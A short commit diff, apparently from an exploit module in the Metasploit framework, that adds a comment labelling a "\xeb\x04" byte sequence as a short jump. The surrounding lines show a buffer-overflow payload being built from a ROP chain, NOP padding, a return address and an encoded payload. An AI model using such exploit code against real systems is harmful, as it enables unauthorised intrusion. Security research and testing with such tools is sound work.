Comment what \x0b\x04 is for
parent
92c801d936
commit
144fa0dc0e
|
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
pay = rop_chain
|
||||
pay << make_nops(374 - rop_chain.length)
|
||||
pay << "\xeb\x04"
|
||||
pay << "\xeb\x04" #Short jmp 0x04
|
||||
pay << [target.ret].pack('V')
|
||||
pay << payload.encoded
|
||||
|
||||
|
|
Loading…
Reference in New Issue